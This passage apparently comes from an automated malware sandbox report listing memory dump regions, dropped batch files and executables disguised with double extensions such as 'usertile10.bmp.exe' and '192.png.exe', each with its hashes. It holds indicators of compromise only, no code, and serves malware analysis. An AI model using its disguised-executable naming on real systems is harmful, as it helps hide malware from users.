SHA1 6940996b050cceaa63f88d01290380bbdf496656
SHA256 593309cfdf67d2e2f239b3dbcecaa1b8b70700734f8f0dca68c2b8d900b426be
SHA512 4778c2096611b6372c6ec324e21983f35233be55d4cb0cf0379512ee6d8e69596428efd4d16cf3356f8799fab35dff9f186ca35f31b5f717eebf87d0eeb2afed

memory/2308-273-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1228-272-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1416-282-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SgUQsoIY.bat

MD5 0d18e3b30a23a9d492ae73d4e918625d
SHA1 395faada8aa6ff5f32c622bddaadee824c52e312
SHA256 33882f4e27575e851597e388aef0371d71d0563339cb4bf8e51a5c8b8573f203
SHA512 eca8f608a11078555a5d610003bbc7b4274b4d9b8533dff047b484765859eff06c20a9ef89f57bdc6c7831a395499e730621bb6065eb2e2f4516c2e068d208af

memory/536-295-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2084-296-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2308-305-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\muwIswMw.bat

MD5 184354e8775dec3362b31b489811f1d9
SHA1 5c1c14db895de4db1c42741f0d75483e6abe5dee
SHA256 b7e9cda6b737cd5c17c964711f4667ff89e31dc59a2b15ea3ebc3428d8d2d913
SHA512 fb25d327b356b1ccfa8096d565dcae58bf8f4d765be5338fb37da46760ac59e9a0e3f08f9c5fea6bc505af79d41fa6519edd930c20a1ef6e4b3a62c9e758d375

memory/2084-328-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2080-320-0x0000000000120000-0x0000000000154000-memory.dmp

memory/2080-319-0x0000000000120000-0x0000000000154000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cOwgwkYI.bat

MD5 be6ba1bca8a593e7fa471f1bdf26d25f
SHA1 349c5a80a5e769bdcbd3f1f9e411d6110f58b0ae
SHA256 93784094a4e4f18348fd94584de44ad2ddd0ae00040b739bcdf8453feba5e942
SHA512 84c481051f53c2596ea337ffdb606d3d4b1e1c09378b63efd470e1b698e6c9abbeb24f1fa7c9bf580f267371ba4afb911d979cace48a35ced717b6a750c0aeaf

memory/2596-342-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2172-351-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TEgcEkwk.bat

MD5 5e888628cfb3826c48046f0571c2876f
SHA1 a4533277d5338d7541251f56e31341dfd7396de0
SHA256 ddd3d21741558450de702cdf8d6df1296f47ac2c423e5f550aee27ae2d16c0ad
SHA512 143a279ed85ea7a766d4dfb4a199cedd2ec08bced0b241b28fd53bfe0dcf166a0bbc78acda364828b995b0e1cb23034a528405dc1a6a89de6c6af76da15b5674

memory/1556-365-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2596-374-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wuAwUQwo.bat

MD5 3842c79dc7fee96391146a86c8c51d4e
SHA1 7abeecf4cfa52306ee01493f920f7c4d30e88ab6
SHA256 4301fb2d4ca8ba8133f200e5cd0c7d4e8d918fccdf98e1dc28e78d0f7f2e315e
SHA512 dba0604d667dac083d2596ed8886df923de1b71f16b70482c3939fe1f6f8a5c08f89817b9d7b1af6392fa7aea0c991e35d7c56fef0c1b7af0f3ae36a9949814c

memory/2236-395-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ymQoAoEQ.bat

MD5 017ea670d7c57ea55c9af2171db6063d
SHA1 25542de3f4199aa43b9aec6f3fd52c6b8fd8b479
SHA256 459b24aa76cc8958a0fa432d7fbc60e64097e06627cf9519575a78882d34ccf5
SHA512 3bafecb39615a62ce636578493e0fa2c26ae40f4120d541c6acb694678d6c73469de2f5b93a89ab7364171dd357558d4191f7b3cca20a9121b8d2f4832005625

memory/1576-410-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2960-409-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2960-408-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2868-419-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vGoMwUEU.bat

MD5 c61db3aa9d367f765e6f0d44fe7898e7
SHA1 f4bf55f02de4a41a18f4e0868dc2ef3702feede2
SHA256 2c2da81fd678edf0ea1875767a4d679ddc7bc2cf5fe885a126c9ce040fe91835
SHA512 7c07e0e28bb80b96d44e2778e0e9b53f0f374b0b5052656858a2f0222ab8a93af76a2f1cd9b776aa7572c20e745965649181643f8cb35df591d929bee133cd37

memory/2724-435-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2788-434-0x0000000000200000-0x0000000000234000-memory.dmp

memory/2788-433-0x0000000000200000-0x0000000000234000-memory.dmp

memory/1576-444-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eQwgEAoQ.bat

MD5 8c832958f22201acad83e9d52e22659a
SHA1 9ec36de5dcd4e0462bc7bcbf75231d2f252c1771
SHA256 ed8a73e20de63db02d2244998f03854a515d7e9b57b647bc82984d116b19596f
SHA512 659a80a3353081c416e93a661d49c9e5bde4d16447a90e00f317f4844f30d72169ad50c086176f226c980e7499d25bb0543fe09a6a270b40ba3a31728a67ec43

memory/2760-458-0x0000000000180000-0x00000000001B4000-memory.dmp

memory/2724-467-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aaowIAsc.bat

MD5 6a268e5db34900535a6d5aede76645db
SHA1 f925be15f7177d0a1b056aaa99f55a71a98dcbf0
SHA256 1c13c14644ec68b3a2b83f36eeadbe56aabeb0cf6b36ab34ef613881b76ba6f9
SHA512 1f40703933f74ba696a3621e2cbdbba03aad1664cec58e56b5ae0aa642005f95e2357e8adc88e5af3263855e96015c8a95228307662cd43af509b730ee8df913

memory/3004-480-0x0000000002290000-0x00000000022C4000-memory.dmp

memory/3004-481-0x0000000002290000-0x00000000022C4000-memory.dmp

memory/2584-482-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2396-491-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qWAMQkEQ.bat

MD5 4003001cd2fe0ee4fb10e0cb4319c3c5
SHA1 65a4324fc29065638b03845024780c8ce64d1e41
SHA256 691cc726e9a5d2afb6cb51aab1d03e14679a34622627902a1671fb878eb88a52
SHA512 e623b826622a1602aa2e77df663b44566466494bf9dc6100aed80ac76b0414561653dc14a17b89d3a6d6635ba0795101ae2a537c8b842a04650cc25d89260bc6

memory/2584-510-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UsYU.exe

MD5 636615fb170ecf79f6af9e3beb653898
SHA1 893fbecf0907ce8ecf8dd6629f9c37dca0e93862
SHA256 2c562e749d9a0d6423db6dec3f0dc586b77778c26687c39d63f29c7100e81349
SHA512 9538321a0598bc90c7946511cceb99fb2bf6eb71e325bf7bc7605bad7de6585302d2b33147b7e598b7eee2cc2fc789b72167e35c21042ed0c31a364ab858c385

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.exe

MD5 2b7b3c2178d3c4762596c71239d9375d
SHA1 b64f44e9a20f08111093ee856cf27355f272a778
SHA256 a82c8305cbc76353352dca86076e56493b273a1ba2d30e894c2e906711a0dab3
SHA512 b6a17779620f169ec5cb2a909524892990f8224fe8d17dff3190a5ce0eb12a6e050a05d72d2d25be426689279289cae045963374e699c85cd00ddd84a9f47158

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe

MD5 646f725523c62f3e441e061e945ee902
SHA1 686aa794090180876a7cb8237c58b06da7b3f0aa
SHA256 65a5fa6d0eeaae98d2a83e96e8f08495074cdc6934825c3021bb8317577c41aa
SHA512 cf58172226a3b4992e254e6c4d8c81d85a08947c070fde3e6ceeb17930910bdc4a29168080d32d43c6ae41789e1c1cc43acbcd36e3b11ffe58ced11bd90fffc5

C:\Users\Admin\AppData\Local\Temp\jUMw.ico

MD5 47a169535b738bd50344df196735e258
SHA1 23b4c8041b83f0374554191d543fdce6890f4723
SHA256 ad3e74be9334aa840107622f2cb1020a805f00143d9fef41bc6fa21ac8602eaf
SHA512 ca3038a82fda005a44ca22469801925ea1b75ef7229017844960c94f9169195f0db640e4d2c382e3d1c14a1cea9b6cc594ff09bd8da14fc30303a0e8588b52a7

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.exe

MD5 b053d07a4426c19d2ca86621df55a5ac
SHA1 70017860e94dc1ac1e7cd037a6fc84329fffe851
SHA256 f5fb57877b66b9a94572478eb433eb41d7468a90b6c3641ea65a10c3a2b567a4
SHA512 0e3f087a8253a043620ada43de4a8f6945f327b65119ce51843576515fc055ef7517e38a60aa411e1bc8a8e94fc959825d9b8766a3345abb0cc1a4aa55cdb324

C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.exe

MD5 119ec475240ffc934568ae166a4317fd
SHA1 31198d9cf14c7a4f5e60dcfce8d6f5a1d478a6eb
SHA256 f6634a8af95df4f60c4d52b3ae4aa6ed49bc67f6e0dba0f24fb58e2b5179c8c6
SHA512 33360837e2ba6645207f3c3ff850da0fbe6137e65b913716dc76e6d1e98074f9327f8a318b2f97e39a6c971269b955b09362957eb524ebe3df87d4d6cda37ed5

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.exe

MD5 c198d84839186290f763af60a7ed444e
SHA1 e17c471b79fe818d012a3a6e70681396b713472b
SHA256 e526de7daa3be4a6eff648b11c5016510a4c8633e7494f259bdf860e24107d53
SHA512 d17e83951ec45965b657161a1f825389adf76954bb66dbc076e8d7c87b32e64501f3041e40db5466cce1b28c6e2a7d78d5faeafe64b2d7a0e857dd0454d5031b

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.exe

MD5 a548f66f697a25a6b5e206a079894002
SHA1 a99c8a3d3e62fbfe0315810f748e318f72c5ed29
SHA256 51cf9907b5aa647ace61decb803498987d58eefe7d4ace276ccab95ffdc10514
SHA512 07315acc62a43b180d336a02b6a1beced3775c1e4f28018dd32ed251fdd547d4623ce3885e6ccd771918b2b8d4584191ac4ce6bf45a05f6eb5a13d9cfff2e85e

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.exe

MD5 d44c6edaea1978a146b1765463254f03
SHA1 14b6a3d1f52a8145fd7858ece3af4f756f47be83
SHA256 0a785042454d74fb906ffd43db411775f0a11b5a6528a300b5d053f9a0247e6e
SHA512 4ae89636338c820f9d07f4c21b8241fb392578e21e7fe635cbd47249128ecd779e5df15cfd3c78da8107f2d5564efe36f864f1e22f6e1c07e830779653312e52

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.exe

MD5 637ba0b149c0ba2b35fe1170e97379fa
SHA1 8c0406e040c1bd8a24f56dd0fc01605a77773062
SHA256 a9e6ceba697566a84fab2e7a9dc438bdadfc43d27040b9f368422f44e6eb1987
SHA512 4845b85adecdacc3ff24193417721aed2df97bd5a9e25472e672e0d354e6e25abbbaabea9f57aa324e2a5a543dedbbc7d4d3a378f0bc387863aabf4d925f8beb

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.exe

MD5 abfca46b3351f178063bf17d3bc49641
SHA1 9b886ac4f53545f573288e05c7866dd8367b04b5
SHA256 6de8a457e1162614e188b3c08caf8adaef93ae5c6df04ab5a2d8cacfe7202d06
SHA512 acddc462ffee5904a2bedda40405ea165098aea19b156f484259e801dce657d9fc7157e17890e7228d56e4f4cc08fca0ee8ee4d8d84afcdfc99edbba38436307

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.exe

MD5 582bdacccbc3203ba6021babf1d3d3b4
SHA1 48035823cb912b45974303b81a1e974751750be2
SHA256 681913c2f227ce1ec5bf027d8d483bb69c939ccf1031f4269884ddf271072d40
SHA512 5cbad416f6dbd0a25db6030711a638c9d40d86182bab10a50043318ced6242a0136dc516bd8696bf1dd301dc7d0f7e0846fbbb1104775bcd6771484c9cc4d980

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.exe

MD5 2f2587e1c5b184d2e522b081e3fc70b4
SHA1 222cdef5d73fd97abcc1aa6de3f8891f5765ea96
SHA256 e8aff9e239402945232f1a3454cbb248970bba6b3dfc822f4769b26921f4796c
SHA512 dbfd65f8dfc776f9a2f6f640868f2eb0cca46c815f16187c575b3974a938eeb84ce41b4117ffaba1332a320251fe55436fe9e0adb9661ba0e126adc1ed7734f8

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.exe

MD5 269789a1172f4d11c34c000e925132da
SHA1 f8188d445234a0e0e2812ee48d69fc980ce2cfcd
SHA256 dcc623229dac44689559ee05c61e7114b0809c108ad8ab360323c8e5f4755eb4
SHA512 4a271c1ca2f109edb3f10e4f60a9432d4d3107acf98874cb798adc79f72e1317f53cc075dfeed441572ee44034ef814f1b8f437b11ea9460edab27f6621b9bb8

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.exe

MD5 44dd73dac53d31d19c43de7809caff74
SHA1 1dd94fec69fe3991a8ac21c13829172166231b4d
SHA256 b046e746e5aa38944489e4335aaf149bbd5a0700e6fa065c4b33d8fdd4510247
SHA512 babce6106f105b5747b64174cdfcde780e63468f31bc0a20ebf66ddd84991a8ac09f98a82e3714f3884b46acf6c64ce59cd2106865677a0d165700bc26697610

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.exe

MD5 67eb9f3a9c85e39061e3a352f34c1b15
SHA1 739d21aa4ad970117219297a9f12449a510586ee
SHA256 bfa45e2f08e30de71613388c815baec11305095bf3f3b1bed4fbb6708c975cbe
SHA512 2e324f632db1fd9de9597a67d8b5a3a75f4a9b8535612edad02c68bd78ad7b1fc0f72b5c2638c05261673ac5872cad65abec2430937da1aa4d49d053a0b6b2bb

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.exe

MD5 6db6b264606aa3b0cbaa045d2a6af2e2
SHA1 d521d58346f9f969ac822f09b5aeb5073c207916
SHA256 2dbfaac0895e4fb8c4c243c95e4f101c96a03221d0b1b5aa7f4cdc4603659f21
SHA512 eff2c2ac09e14d1906aac2209b3e3e03b55dae4ac439ed7b68161cb79f09f02878842d076e175590764aa100ef004a27c3f6955646b45b2012502aec395a84cd

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.exe

MD5 ade9695a1f646a2909f54943988984fa
SHA1 cf2bb34670204d9d6135c35032da1def5fa8f0d3
SHA256 f4bbdcd51a1f252d8a228b15c233df0dc6e7d16a197e24999882bb13e3452df1
SHA512 24cb0d1c5a4eed80ac6432407fb49f886b48bbeef5824534421bf28da533b507b8a072ba43ff13eae8d7fae080b07c4675ff355d4d04d6c5ed1771bf3f1e748c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.exe

MD5 b6407ac7d03db63715370bd3581181f1
SHA1 b72150ea7c1fecb37049f25af4fb5bc9de05ed4f
SHA256 fc65a7633973b616bff979dc2329d936e9a371d769f688a09a8213730305acf3
SHA512 651bbbc2091a8bf67c77ef1b6691897eccbacecc87ec5291ccf380720da6c3017984a7bd1bc90d763779ddd220b2739fce72390814bffd34783767c48b7dc66c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.exe

MD5 5bb3b6426515625fd8c7003a1998fcb2
SHA1 d33b85f1a3facf3082c94fd0d631778fbd3a93bb
SHA256 bceb10b4dcd60b534d0365fc1f26f8cc2b0e427acb4953977a685200f7f0312b
SHA512 925baba5d151e2b979821986b0d3572b31ec5851e5b1bc3a2f7c20462df1498a60014ae076fab336f717a7f5b7a370180d414b941ca438c1158a01636e32ec16

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.exe

MD5 a9957207e75ada24637dcd244801e2d6
SHA1 3cbd06333d3b09bce89c1022dee9a17ae03bf3d1
SHA256 35683ce511c733e9422e499c89d4d1732b7a1e9bd0641b11b5dda1259cbde035
SHA512 f04d6539e154f20d5c95b58a05172c47525d579023f19d58a019d342101f0935fa166794f6aa41362a79512d6090ebd60635e24b870138c3b8e871219b4ba05b

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.exe

MD5 17dc5c119b11c217eb6c6d45678a60af
SHA1 468e01e78326a3b0239df08b6f96f71da595c54e
SHA256 b44d233220271440791744a537dc0b512a129d32b70f33c574719f33ee0de092
SHA512 3a53c2c863e1ba56194f290932ddda2c284caf8a955244c9b5bff070fc655754050a6c762bcfd4aa877419050cc00be802c1b401bb5e600fb46b193b7a9d916a

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.exe

MD5 d3d19eca5e28391aea0ab764426458fe
SHA1 c0be96e542c5aedb879220dafe8f1dd9fd833c69
SHA256 27a3c4e6557254a4bd020dfae73efd36880bf86fc0cc20ca174d018c3969656a
SHA512 2ee9e6e9539a3199ab64fcf955fdbddc3ffdbce6ec9fab93d3b0a718ac93e10a0860d9bad8c87d27288fc34510e6daa651e72519dd01009dd35267753af757c0

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.exe

MD5 aadd808dbbaf78a12356fbb36b08edf8
SHA1 9a24057685022db64b3f7aef41ff2a3fa2f1ec54
SHA256 d05f1bd870d4216d1c40f01fc3f1e20d7aa5ca0f15b1865c0c11e14fe271e998
SHA512 4ff594d72c8c9919b2908d9af2f840525950099ac91d7cc1e4b05a7988bf282bee354874a2b74551ea10abe0e903d5bd035c52eabcc0a5bf8d306320b88ef8cc

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.exe

MD5 212a6d058807a332b8469285f0138777
SHA1 417a32ded5d306c151e3b4c06ea6ebf5014a7bd8
SHA256 4dad79c133281ebfd9051f8424e3fdb3d327817baf7efba352fc14b9bcac7448
SHA512 c231b7b8d7e33298990288ab379968db7c362d073981297fe53473a1a24092cd5ec96396242d5beafd5a6a74951affe02d2f90f9c6aba40987f46d8175d196f6

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.exe

MD5 b5784b172a8f5eca2dbceb7e4c40c911
SHA1 4fac4e2dc8ffa1ac2b2ee11473cf4f79d79b80b5
SHA256 fa7e7ec2b38970901f455cf893ca9a6b439da74eccbb8b2514c392d8462a98bf
SHA512 1aed1701a2d0006d7670c8234d9332c5fe0f563d50290fbbb065c421a587a39e3c6ea0b91c4d0086500db12f7dacf950a61dc3df9f644a6f5d3f1830f3f1ec15

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.exe

MD5 37bc544260e9147d9421e9709b0e34ed
SHA1 d09b13cf82a81041446235759afdb3a1e6253244
SHA256 eff49347312cd76a94d415105ef0610f2ac6d7667fdf9cd0f0c6974778506296
SHA512 53ab037aa39dad0f01eb5ec6502458690581a68cb0d059f99b0de3a304212e1437575c28ae57d34f2e8230090e92d85080bfbff416640c3b58f46c0767395755

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.exe

MD5 fde8da0bc9859db684695d6fdf409883
SHA1 5fb09b47e214257251dfc4d167ddce10a9ffff1d
SHA256 b8d1382099a2a5e4ec7ffb037631cfa3cdbd096ef3964fddd8239c61fe815642
SHA512 9bb06f31a6216b9135667ebe12584878784ff836d52542f6957512121e5ab5214366e106bf09e8ec91cb4455b4c5748bf9310cfc05e353623995e820b9f7528a

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.exe

MD5 5df3b7eab19be25be07f0ad2c5bb1c3d
SHA1 3e1062786990b89fe01064f70b3c02179ea0633f
SHA256 f138720fcf74aae31cd488c69e23a9f52342820999bcd0c156141bd83440c01f
SHA512 10aacd6191bc020124410361db79c8e311e6db7c7f28c5b4073fe2035ab077d730321509b2f62bf3da22785d877248c5c2afd21bdfa57e2fd46671cafa7edf79

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.exe

MD5 8ab01861111327a256b264b4922f094a
SHA1 235290c54332ca4f1a7e041e9fb024aee3f996b8
SHA256 b9fd70e46b394aa2244f5cd6b94c0cbf3020bfda9ff8ea87656f3cf368d803cc
SHA512 9bf1c77b89f03a96b2c9beb9608ac84b547a17b101240650fb87bcb534bf924d3bf97a5f5bcd919b0dedc40578f67c7422265e9bb92c5e08811b8e62e4108b3c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.exe

MD5 3429cb479900b10c79576f8dbdece12a
SHA1 b4e2bbb1312cac168e0e0aa807750a3f2b0a66af
SHA256 6a384b167fab6bf5b5147778c411ffe4236c718c5d0c4b76cd6bf08d23952fde
SHA512 f4801b4eaecbb99e5d2977ea62793d70a76be3256d761f72d300aa83a5051b22b0cd1f9a2020f489fe81258b3beee22df1f79dadfd50bdc35c2677ed6b226dff

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.exe

MD5 a52a25daaf2ee350f8620b139d785f74
SHA1 083cb2e86489acdbacaf186a470f57ed0f5ac24a
SHA256 bcfe285813c2624456c6d04ac773cc9f21ba28b8dcf89d31c99eb04083829d70
SHA512 4c7e0e7ceb430cac3c0dc15c5e3b0fc596b1d24bb5bc8c20c508790d673c9783de1e6d4ae39a2b868d602ec4c637e39c446e43af68ca81c4061f3cfce98057a9

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.exe

MD5 a0479c2bce50f99a79fc3028ec8aebfc
SHA1 d3d95b154c6711c3eb2bb52b66848471a4011781
SHA256 6cb36337c5038a18c62f4a38acfdd29e441a2685389307e96e0733af1b8caeee
SHA512 6778b1d5cd65ade55d7a78696a7e103ce90d419e54bc83495ea148de6fbc99a771ad31acedbb79099ff4d57f6c9f49b1a861f1914d85e1b3e0c4b214c1a012ad

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.exe

MD5 a71a7e929e1bb2bb9258022990114219
SHA1 7daf1264e93356b6bff44e023c1be5dc3723e8dc
SHA256 bbc77f84956ed7ea615d09256292725bea9a90c60cc849a783facc12b8b68b1c
SHA512 a0793fb8168b4cd765dc80beb6a9d4e3929337d0a27c1f007e34493f098f596188d93ff81b9f916cd398425534c11ff250a9a500aa468b879650d1f085c003fc

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.exe

MD5 4e5e23a47f8be33cc4bb92c88edb1785
SHA1 b14407c89be21db831f007d51b2dac3a05b40d6a
SHA256 4dbe50840d8c2216279f99cf109c49a1e6be9d59c5031f8b5cb463c286c4d2d6
SHA512 3c2edda88d23c3414198d1f90c89e5aee27e888253ea21dc1dbd21e74e84a0706ebd135f84c1185d213304eecbe1c1abf6c5ecde6f0c4c89600b5dca2bd1970c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.exe

MD5 6acc1fca863e347299745af440304555
SHA1 9d3f03058e87a27e6145ccc639baecf16036fd7b
SHA256 0c6854dcf15e303219dff0eb4206e03b0cea7e40663de27c29005e0b16f45d47
SHA512 ceffbfc168a4c5b063d221430220556a0aa589a5ddb4afc2ca6cbbfc96da3891e0264ab4a8faf70c80258dbde5319a00e6427dd4468d359796a30d252b1972d3

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.exe

MD5 f8f0474d44be329038ec406baa9cadc5
SHA1 3927f3b6805a428c3ead326256c2d83e126c18ad
SHA256 0a3939bdec913e1e07bb82cfc53decde902a93727b528bfd0bb68f590f280252
SHA512 04557954e7c7af41bd655a8b6a76c7da881fed2d1be9aa449acb0063c333a22e3ee21177be319aff8a00cc6dfd0017c0dc201ad6864841831f34037f2ed77398

C:\ProgramData\Microsoft\User Account Pictures\user.bmp.exe

MD5 7de3adcb784f128d1a0e817928b2bcc4
SHA1 c1aa6ebbb6db6cffdfd50c087c8f0f4b763fd251
SHA256 4d94c82478dbc6a9b23f335d89a88d4184da9c842e8ea052aa2dd93dc598a2e4
SHA512 ff611c4db76c3606bd1f8dce4b276b0ee81beb73a5559a96f41f8460a463b057bd155b60595928362d7d19fbfd403fe61ebc15a4669b732f2c3bc07679c5ac40

C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

MD5 8464d02d336c88cc6336a8627261a6d4
SHA1 5899bc403b5e9bd7fc39421094a7969740566eb1
SHA256 225231cbf71c85ee520b3eb1958bcc040c42dee6e26ae1b66dabaec49d048a56
SHA512 7bf0418b71968513dd4de1f98125bcd017db1caa8e754b4286964b1b5cd518098c3fcb93ce27d3f552f18664e0c424d89178a411ba2fb629d05c7295e38a42b0

C:\Users\Admin\AppData\Local\Temp\rYwI.ico

MD5 ac4b56cc5c5e71c3bb226181418fd891
SHA1 e62149df7a7d31a7777cae68822e4d0eaba2199d
SHA256 701a17a9ee5c9340bae4f0810f103d1f0ca5c03141e0da826139d5b7397a6fb3
SHA512 a8136ef9245c8a03a155d831ed9b9d5b126f160cdf3da3214850305d726d5d511145e0c83b817ca1ac7b10abccb47729624867d48fede0c46da06f4ac50cf998

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

MD5 5be8b33694e3095627d8ad565a2ee141
SHA1 c772f18ecf5c23e115d15b2ced5332e4b437917c
SHA256 51a9265f6da68e1011f6eb249f5cb80f21391399e901676b73dbadb483fc5553
SHA512 5efea1ca0afed1831a0b7a6e9a5a3f1f1f422a958714a465185c9fb3c51c393ecea3bbc6a0457ae61475a0d4a5074da4e2ce4e3c266407ce091a7c81166d6bc4

C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe

MD5 d4ca70603f09055ba2263247f6d45a78
SHA1 e44a179a6141f53956a05e216732abd5a80b125e
SHA256 785dd314cfa1330e965a02832c6e6904e2e582685497596549f833ffdeed5766
SHA512 2875c30da613cb888d1a441b936760997eeb989b27c78029727949b2935ae4650cb0c485959ba9092e6ced2f980b315e59ba7bdcfa12326e8fd74c83caf72dbc

C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe

MD5 2908f68e347d41ea3257f1a82da3749c
SHA1 5aa2e0d8f4e47fd45a2c48a090dbbe8b731b6723
SHA256 502c0c7cbb758a61f8bcc02039ad5c11737ac279a7fc594336381ba4dca36b71
SHA512 8278b6f7662362ad8cf8aa6dad9f316206ef75f4e5e17758a70e5ee5153e413ad43415f704eea6774cc6886dfd3f2a00cc5063a54a7193eaddf47a7628e74849

C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe

MD5 4e3d844c50d5001d6f2a5b4cfd7f4ee0
SHA1 88b29b40da9136c2945283cbd8fcf75fbc571a8a
SHA256 970f367b7789a8659672a965709488b2cba806fed9651a5d240144fa6f527df4
SHA512 9123ef4036e58dd5bf2ec13b73b5846db3b417c6173c3d8804fe9376840f68b8d924de925249da3367499ffd55e0533a6a51251fc8ad86387584b1b1900cf145

C:\Users\Admin\AppData\Local\Temp\uMkG.exe

MD5 5cef38dbd2f39d960a24d6a99b83be92
SHA1 874d186e8f9e2a4636cc35c287c5228ecd3e405b
SHA256 6f0158bfa1144aaf8d96576872e51d9f8731e562df38f47f13d53832b1fb9c9d
SHA512 0ab9ca527be5090a865a331d9d2beedc08bba6606a8c0d20c9af49a0b6c5417f975c2a679ec653f68c3ae90e1dcf37717f639de58f9286b3a276f54170adccc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.exe

MD5 b8ab8e89eeb541b246406c9d98ed003e
SHA1 62d506879fe3b3d15ecd85d94666467a34039030
SHA256 97f070f43dd8c90261eec8dae4e4f7c314ec596782ec05bbe6cee152e0211a23
SHA512 422b88b6c3101e30e72fbbf517df35d24b61ce3124f4b85bba636f7d286c4b74747721b7dffee6b3c0562e3da85373ded822b40f2ad121e29f2a4e6d0df8e329

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.exe

MD5 c77ea1decc0a152db0190a1067449ecd
SHA1 6e67c28b2dafda012516f074c3a128289ee0274a
SHA256 2667f5e76e44b1f740a442cfc56258f631f60bb9523c346f92a3d74ec35c017b
SHA512 5dcc842ea4d45200e8728f16ee4835e9769108061766afddd1f657eeda725185b2ca273f7bc34a4a9627ffb108b895ef0fe3f2be6b40e02e49fcd162a5a48268

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.exe

MD5 4cb4e3f98da4ee90aa185237497a57c6
SHA1 c6522674e64eebb795d68b9cc93f080be324a929
SHA256 68427c6ab16d606571b7bbf16c78be578d3d2a7f44a083aa48dc45bf51e32608
SHA512 62ef45611c8c66b6b5a402f6aec08f0622c2c01ef360f586b260a885adb20f53379fb98940a17d633218659230b5cbeebdfe6f84862ae1dcb8b0d4f8d79555c4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.exe

